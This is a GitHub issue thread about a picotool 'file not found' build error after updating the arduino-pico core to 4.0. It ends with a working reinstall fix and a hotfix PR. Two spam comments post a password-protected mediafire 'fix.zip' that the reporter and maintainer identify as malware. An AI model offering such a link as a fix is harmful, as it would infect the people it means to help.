earlephilhower/arduino-pico #2355: File not found after updating to version 4.

ianm8, 2024-08-26:
Hi,

I'm getting the following error after updating to version 4.0:

exec: "C:\\Users\\ianm\\AppData\\Local\\Arduino15\\packages\\rp2040\\tools\\pqt-picotool\\2.2.0-d04e724/picotool": file does not exist

Compilation error: exec: "C:\\Users\\ianm\\AppData\\Local\\Arduino15\\packages\\rp2040\\tools\\pqt-picotool\\2.2.0-d04e724/picotool": file does not exist

It's just the Blink sketch. Happens with Pico and Pico 2. The files appear to be in the "bin" directory (on my system):

C:\Users\ianm\AppData\Local\Arduino15\packages\rp2040\tools\pqt-picotool\2.2.0-d04e724\bin

This is windows 11.

Thanks and Cheers, Ian

Wanderx13, 2024-08-26:
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

GendiAstaNugraha, 2024-08-26:
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

ianm8, 2024-08-26:
OK, what is this "fix" mean to do? Windows tells me it's a "suspicious" file.

ianm8, 2024-08-26:
Just to be clear, I am not running this "fix" which appears to be a trojan.

earlephilhower, 2024-08-26:
Don't run it!  There's a bunch of thx spam today in my repost with that malware!  I'm deleting as I find them.

FeuerSturm, 2024-08-26:
@ianm8 
I usually have similar problems when updating the pico-core, fix that always works for me is
to uninstall the arduino-pico core via ArduinoIDE, quit ArduinoIDE browse to
`%localAppData%\Arduino15\packages\` and delete the "rp2040"-folder in there.
After that start ArduinoIDE and install the latest version of arduino-pico core.

Always works for me.

earlephilhower, 2024-08-26:
Just tried an update myself and experienced the same thing.  The `package.json` file explicitly listed a new picotool, but the IDE (2.x in my case) did *not* honor the new file and left me with the old one.  In my case the path was fine, but it did not have the new `uf2` command and errored out there.

@FeuerSturm 's suggestion will definitely work.  I'll also see if I can adjust the config and make it realize things are updated.  Because this was only OpenOCD and Picotool being updated I tried manually to minimize the amount of re-downlading folks would have to do....oh well. :(

ianm8, 2024-08-26:
Thank you so much guys, that fixed it. Have a great day. I'm looking forward to getting a Pico 2!

Cheers, Ian

closed 2024-08-26 by earlephilhower

earlephilhower, 2024-08-26:
Just verified that from a 3.9.5 installation with a failing picotool, installing the latest 4.0.1 hotfix caused the IDE to d/l the new tools and be able to build exes properly.  Thanks for the fast report before it got too many downloads!

PR #2356 (2024-08-26): Attempt to make IDE really downloade SDK 2.0.0 tools
Fixes #2355
commit b8408961 (2024-08-26): Attempt to make IDE really downloade SDK 2.0.0 tools (#2356)

Fixes #2355